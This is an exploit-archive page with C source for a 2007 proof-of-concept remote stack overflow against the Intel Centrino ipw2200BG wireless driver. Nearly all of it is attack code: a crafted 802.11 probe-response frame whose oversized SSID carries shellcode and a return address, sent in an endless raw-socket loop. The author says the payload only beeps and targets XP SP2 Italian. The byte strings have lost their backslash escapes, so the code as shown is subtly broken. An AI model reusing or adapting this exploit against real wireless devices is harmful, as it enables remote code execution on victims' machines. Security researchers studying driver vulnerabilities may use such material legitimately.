Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Intel Centrino ipw2200BG Wireless Driver Remote Overflow PoC
# Published : 2007-01-19
# Author : oveRet
# Previous Title : Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit
# Next Title : MS Internet Explorer VML Download and Execute Exploit (MS07-004)

/*
 * This is a PoC exploit for Intel Centrino ipw2200 integrated wireless card.
 *
 * Author: 
 * Giuseppe Gottardi (aka oveRet) <overet@securitydate.it>
 * Senior Security Engineer at Communication Valley S.p.A.
 * 
 * This version of code is only a Proof of Concept stack based exploit that demonstrates
 * the remote code execution on ipw2200 driver. It execute a beep user space shellcode.
 *
 * It only works on XP SP2 ITA and it was only tested with 8.0.12.20000 version of 
 * IPW2200BG driver.
 *
 * Thanks to Johnny Cache, H D Moore, skape and Barnaby Jack for their papers.
 *
*/

#include <netdb.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>

//#define DEBUG
#define DEV		"wlan0"
#define DELAY		0.1

char wifi_packet[]= 
"x50"
"x00"
"x3ax01"
"x00x0ex35x95x7bx45" 						//DSTMAC
"x00x01x02x03x04x05"
"x00x01x02x03x04x05"
"xc0x31"
"x14x3ax25x02x00x00x00x00"
"xa0x0f"
"x31x08"
"x00x9c"								//SSID len
"xebx38xbbx01x03xdfxffx4bxfcx8dx7bx7cx5ex6ax17x59"
"xf3xa5xbfx7cx03xfex7fx39x3bx74x09x8bx03x8dx4bx08"
"x89x01x89x3bx31xc0x64xc6x40x24x02x8bx1dx1cxf0xdf"
"xffxb8xc7xc0x4dx80x6ax00xffxe0xe8xc3xffxffxffx60"
"x6ax30x58x99x64x8bx18x39x53x0cx74x26x8bx5bx10x8b"
"x5bx3cx83xc3x28x8bx0bx03x4bx03x81xf9x6cx61x73x73"
"x75x10x64x8bx18x43x43x43x80x3bx01x74x05xc6x03x01"
"xebx07x61xffx25x08x03xfex7fx55x89xe5x83xecx18xc7"
"x45xfcx53x8ax83x7cxc7x44x24x04xd0x03x00x00xc7x04"
"x24x01x0ex00x00x8bx45xfcxffxd0xc9xc3"
"x01x04x82x84x8bx96"
"x03x01x05"
"x85x1ex00x00x86x00x1fx00xffx03x19x00x61x70x00x00"
"x42x42x42x42x42x42x42x42x42x42x42x42x42x42x42x06"
"xddx18x00x50xf2x01x01x00x00x50xf2x02x01x00x00x50"
"xf2x02x01x00x00x50xf2x02x28x00"
"xddx06x00x40x96x01x01x00"
"xddx05x00x40x96x03x04"	
"xddx16x00x40x96x04x00x09x07xa5x00x00x23xa5x00x00"	
"x42x54x00x00x62x43x00x00"
"xddx05x00x40x96x0bx01"	
"xddx18x00x50xf2x02x01x01x89x00x03xa5x00x00x27xa5"
"x00x00x42x54xbcx00x62x43x66x00"
"xddx10x00x50xf2x05x00x01x00x04x00x00x83x07"
"x5axf0x54x80";							//RET address

int send_probe_response(char *dev)
{
	struct sockaddr		sa;
	int	sockfd;
	int rc;

#ifdef DEBUG
	int i;
	u_char *moe = wifi_packet;
#endif /* DEBUG */

	memset(&sa, 0, sizeof(struct sockaddr));

	sa.sa_family = PF_PACKET;
	memcpy(sa.sa_data, dev, sizeof(sa.sa_data));

#ifdef DEBUG
	for (i=0; i<sizeof(wifi_packet) -1; i++, moe++) {
		if (!(i%32)) printf("n");
		printf("%02x ", *moe);
	}
	printf("n");
#endif /* DEBUG */

	if ((sockfd=socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ALL))) < 0) {
		perror("socket");
		return -1;
	}

	if((rc=sendto(sockfd, wifi_packet, sizeof(wifi_packet) -1, 0, &sa, sizeof(sa))) < 0) {
		close(sockfd);
		perror("sendto");
		return -1;
	}

	close(sockfd);
	return rc;
}


int main(int argc, char *argv[])
{
	int rc;

	printf("waiting for beep shellcode execution...n");

	for (;;) {
		rc = send_probe_response(DEV);
		sleep(DELAY);
	}

	return 0;
}

// www.Syue.com [2007-01-19]